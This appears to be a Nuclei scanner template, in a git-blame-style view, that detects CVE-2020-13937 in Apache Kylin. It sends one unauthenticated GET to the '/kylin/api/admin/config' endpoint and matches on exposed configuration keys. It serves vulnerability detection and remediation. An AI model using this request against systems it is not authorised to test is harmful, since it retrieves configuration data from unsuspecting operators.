2021-01-30 00:28:31 +00:00
|
|
|
id: CVE-2020-13937
|
|
|
|
|
|
|
|
info:
|
2022-11-29 05:41:24 +00:00
|
|
|
name: Apache Kylin - Exposed Configuration File
|
2021-01-30 00:28:31 +00:00
|
|
|
author: pikpikcu
|
2021-01-30 06:09:17 +00:00
|
|
|
severity: medium
|
2022-05-17 09:18:12 +00:00
|
|
|
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
|
2023-09-06 12:22:36 +00:00
|
|
|
remediation: |
|
|
|
|
Secure the configuration file by restricting access permissions and implementing proper access controls.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-03-11 16:00:00 +00:00
|
|
|
- https://kylin.apache.org/docs/release_notes.html
|
|
|
|
- https://s.tencent.com/research/bsafe/1156.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://lists.apache.org/thread.html/rc592e0dcee5a2615f1d9522af30ef1822c1f863d5e05e7da9d1e57f4%40%3Cuser.kylin.apache.org%3E
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 5.3
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-13937
|
|
|
|
cwe-id: CWE-922
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.97368
|
2023-10-27 16:34:45 +00:00
|
|
|
epss-percentile: 0.99868
|
2023-09-06 12:22:36 +00:00
|
|
|
cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: apache
|
|
|
|
product: kylin
|
|
|
|
tags: cve,cve2020,apache
|
2021-01-30 00:28:31 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-01-30 00:28:31 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/kylin/api/admin/config"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2021-01-30 00:28:31 +00:00
|
|
|
headers:
|
2023-07-11 19:49:27 +00:00
|
|
|
Content-Type: "application/json"
|
2021-01-30 00:28:31 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: header
|
2021-01-30 00:28:31 +00:00
|
|
|
words:
|
|
|
|
- "application/json"
|
2021-03-04 16:50:57 +00:00
|
|
|
|
2021-01-30 00:28:31 +00:00
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: body
|
2021-01-30 00:28:31 +00:00
|
|
|
words:
|
2021-03-04 17:20:32 +00:00
|
|
|
- config
|
2021-03-04 16:50:57 +00:00
|
|
|
- kylin.metadata.url
|
2021-01-30 00:28:31 +00:00
|
|
|
condition: and
|
2023-07-11 19:49:27 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-29 11:57:59 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022100854955d17b0fc009ea24a0025932599fce83ec9e55aeca7a62a74b92c5a4047102205444e1e4f6ea19554583d833c022ce1051391a93556f8df25e5e1493a8bf3f88:922c64590222798bb761d5b6d8e72950
|